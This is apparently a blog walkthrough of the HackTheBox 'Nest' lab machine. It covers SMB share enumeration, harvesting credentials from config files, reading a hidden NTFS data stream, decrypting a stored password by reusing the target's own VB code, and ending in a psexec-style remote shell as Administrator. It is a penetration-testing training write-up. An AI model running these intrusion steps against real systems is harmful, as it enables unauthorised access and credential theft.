Don’t get too comfortable!

HackTheBox Nest Machine Info Card

Nest is an easy difficulty machine running Window. It tests your knowledge in basic enumeration and code analysis to gain access to user and root.

Be sure to checkout the Basic Setup section before you get started.


Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.


portscan nest.htb
Grabbing ports...
Ports grabbed!
Starting Nmap 7.80 ( ) at 2020-01-26 07:21 PST
Nmap scan report for nest.htb (
Host is up (0.22s latency).

445/tcp  open  microsoft-ds?
4386/tcp open  unknown

Host script results:
|_clock-skew: -7m37s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-26T15:17:05
|_  start_date: 2020-01-26T15:09:37

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 207.33 seconds

The Unknown Port

When we get an unknown port that scratches the part of our brain that makes use wonder what is behind that mysterious black hole. Let’s check it out with netcat remembering that it is a Windows machine so we will use the CRLF flag!

Connecting with netcat we find a prompt:

nc -C nest.htb 4386
HQK Reporting Service V1.2
> help
This service allows users to run queries against databases using the legacy HQK format


SETDIR <Directory_Name>
DEBUG <Password>
HELP <Command>

Typing in help we see a list of commands. We don’t seem to be able to do much so we can assume we need the DEBUG password. Trying a bunch of default passwords returns no results. Let’s continue on and keep an eye out for some passwords.


Taking a look at port 445 with smbclient we find the following shares:

smbclient -L // -U " "%" "                                                                                                                                             
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      

None of which seem to be writable when we use our

Checking root of share 'ADMIN$'
No, NEST\guest has no access
Checking root of share 'C$'
No, NEST\guest has no access
Checking root of share 'Data'
No, NEST\guest has no access
Checking root of share 'Secure$'
No, NEST\guest has no access
Checking root of share 'Users'
No, NEST\guest has no access

Navigating through the SMB shares we come across something interesting in // we come across the file Welcome Email.txt that contains the following:

We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: we....19

Thank you

Using the credentials we have found let’s start by mounting shares so we can search them a lot easier.

Let’s start with Data since this is where we found the credentials in the first place:

mount -t cifs -o username=TempUser // /root/Documents/nest/Shares/Data

And then we will search for usernames and passwords:

grep -ir "username\|password" .                                                                                                                                                       
./IT/Configs/RU Scanner/RU_config.xml:  <Username>c.smith</Username>
./IT/Configs/RU Scanner/RU_config.xml:  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
./Shared/Templates/HR/Welcome Email.txt:\\HTB-NEST\Users\<USERNAME>
./Shared/Templates/HR/Welcome Email.txt:Username: TempUser
./Shared/Templates/HR/Welcome Email.txt:Password: welcome2019

Looks like we have found some more creds however the password looks like a hash. On further inspection the string doesn’t seem to be any known hash:

hashid fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=                                                                                                                                   
Analyzing 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE='
[+] Unknown hash

We have some more searching to do to see if we can find any hints as to what this password string is encoded as.


Searching through the files found in the shares we have access to we find a file called config.xml in Data/IT/Configs/NotepadPlusPlus. Within we find <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />.

Listing the Carl directory we find that we have access:

ls -l Secure\$/IT/Carl
total 0
drwxr-xr-x 2 root root 0 Aug  7  2019  Docs
drwxr-xr-x 2 root root 0 Aug  6  2019  Reports
drwxr-xr-x 2 root root 0 Aug  6  2019 'VB Projects'

Looking further we find a Visual Basic project folder:

ls -l Secure\$/IT/Carl/VB\ Projects/WIP                                                                                                                                      
total 0
drwxr-xr-x 2 root root 0 Aug  9 08:36 RU

Loading the project in Visual Studio we can navigate to the Utils.vb and set a breakpoint at line 114. Running the debug we find the password xRxRx....xRxRx:

Visual Studio User Screenshot

Using the password against the users we have found so far we find that we can connect to the c.smith user via smb.

Having a look in the C.Smith folder we find our user flag:

cat Users/C.Smith/user.txt

Let’s move on to root.


In the C.Smith folder we also find the HQK Reporting directory which we know is from the unknown port we enumerated earlier.

Since I want to work on my Win-foo we will move over to a Windows VM and mount the share.

Taking a look at the folder we find a directory and a couple of files:

PS Z:\C.Smith\HQK Reporting> ls
    Directory: Z:\C.Smith\HQK Reporting

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/08/2019   8:18 PM                AD Integration Module
-a----        9/08/2019   7:08 AM              0 Debug Mode Password.txt
-a----        9/08/2019   7:09 AM            249 HQK_Config_Backup.xml

Looks like we have potentially found our DEBUG password for the unknown port. We also find a config file as well as another .exe file called HqkLdap.exe.

Executing HqkLdap.exe we get the following output:

PS Z:\C.Smith\HQK Reporting\AD Integration Module> .\HqkLdap.exe
Invalid number of command line arguments

We are most likely going to need to analyze this file but for now let’s look in to our DEBUG password!

Taking a look at the file we see that it seems empty. Bit of *Stego maybe? Let’s copy the file to a writable location so we can investigate further:

PS Z:\C.Smith\HQK Reporting> cp '.\Debug Mode Password.txt' C:\Users\user\Desktop\password.txt

Since we are in Windows and Nest is a Windows machine let’s take a stab in the dark and check for file streams.

Recently saw this used in a CTF so let’s give it a crack…

We can check for file streams in Windows with PowerShell using the Get-Item cmdlet or we can use Command Prompt with the command dir /R:

PS C:\Users\user\Desktop> Get-Item Path * -Stream *
PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop\password.txt::$DATA
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop
PSChildName   : password.txt::$DATA
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\user\Desktop\password.txt
Stream        : :$DATA
Length        : 0

PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop\password.txt:Password
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\user\Desktop
PSChildName   : password.txt:Password
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\user\Desktop\password.txt
Stream        : Password
Length        : 15

Here we find the data stream Password and can view the contents with the cat command:

PS C:\Users\user\Desktop> cat .\password.txt:Password

There is our DEBUG password… hopefully! Let’s go check it out with good ‘ol telnet:

PS C:\Users\user\Desktop> telnet 4386
HQK Reporting Service V1.2

>debug WBQ....D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available

Nice! Checking options with the HELP command we find that we can navigate directories with the SETDIR command. Let’s change to the parent directory and see what we can find:

>setdir ..

Current directory set to HQK

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command


[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

We recognise HQK_Config.xml as we have the backup of it in the HQK reporting share directory. Viewing it’s contents and comparing to the backup we find the backup is missing the DebugPassword setting:

>showquery 3

<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="" xmlns:xsd="">
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>

Let’s add that in to our backup as we may need it later with HqkLdap.exe.

Looking in to the LDAP directory we find our HqkLdap.exe and a .conf file that we haven’t seen before:

>setdir LDAP

Current directory set to LDAP

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command


[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP

Viewing the file we see another encrypted pasword:

>showquery 2
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local

Let’s add the username and password to our RU_Config.xml and see if we can decrypt it.

When attempting to decrypt we get a padding error! I think it’s about time we take a look at HqkLdap.exe and see what it does.

On inspection we see it does a few things but something that catches our eye is the encryption function:

CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)

This looks familiar. It looks a lot like the inputs in the Decrypt function of DbPof.exe.

Let’s go see:

Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)

Sure enough in Utils.vb we see the Decrypt function being called with six inputs which is the exact amount of inputs as the CR.RD function. Let’s change the inputs for DbPof.exe and execute to our breakpoint again:

Visual Studio Root Screenshot

Sure enough we uncover the password XtH....nGX.

Now, using this password we can access the C$ share and grab the flag from there…

But I have missed an interactive shell throughout this machine so let’s finish off with one: NEST/Administrator:XtH....nGX@nest.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on nest.htb.....
[*] Found writable share ADMIN$
[*] Uploading file aWScCAlj.exe
[*] Opening SVCManager on nest.htb.....
[*] Creating service ykVj on nest.htb.....
[*] Starting service ykVj.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt


Nest was an interesting machine. It was quite a CTF’y machine, but I enjoyed it. Some people don’t like that, but I feel that it get’s you thinking at least. I wouldn’t mind hearing what you thought about this box so find me on the various social media’s and hit me up!

Hack The Box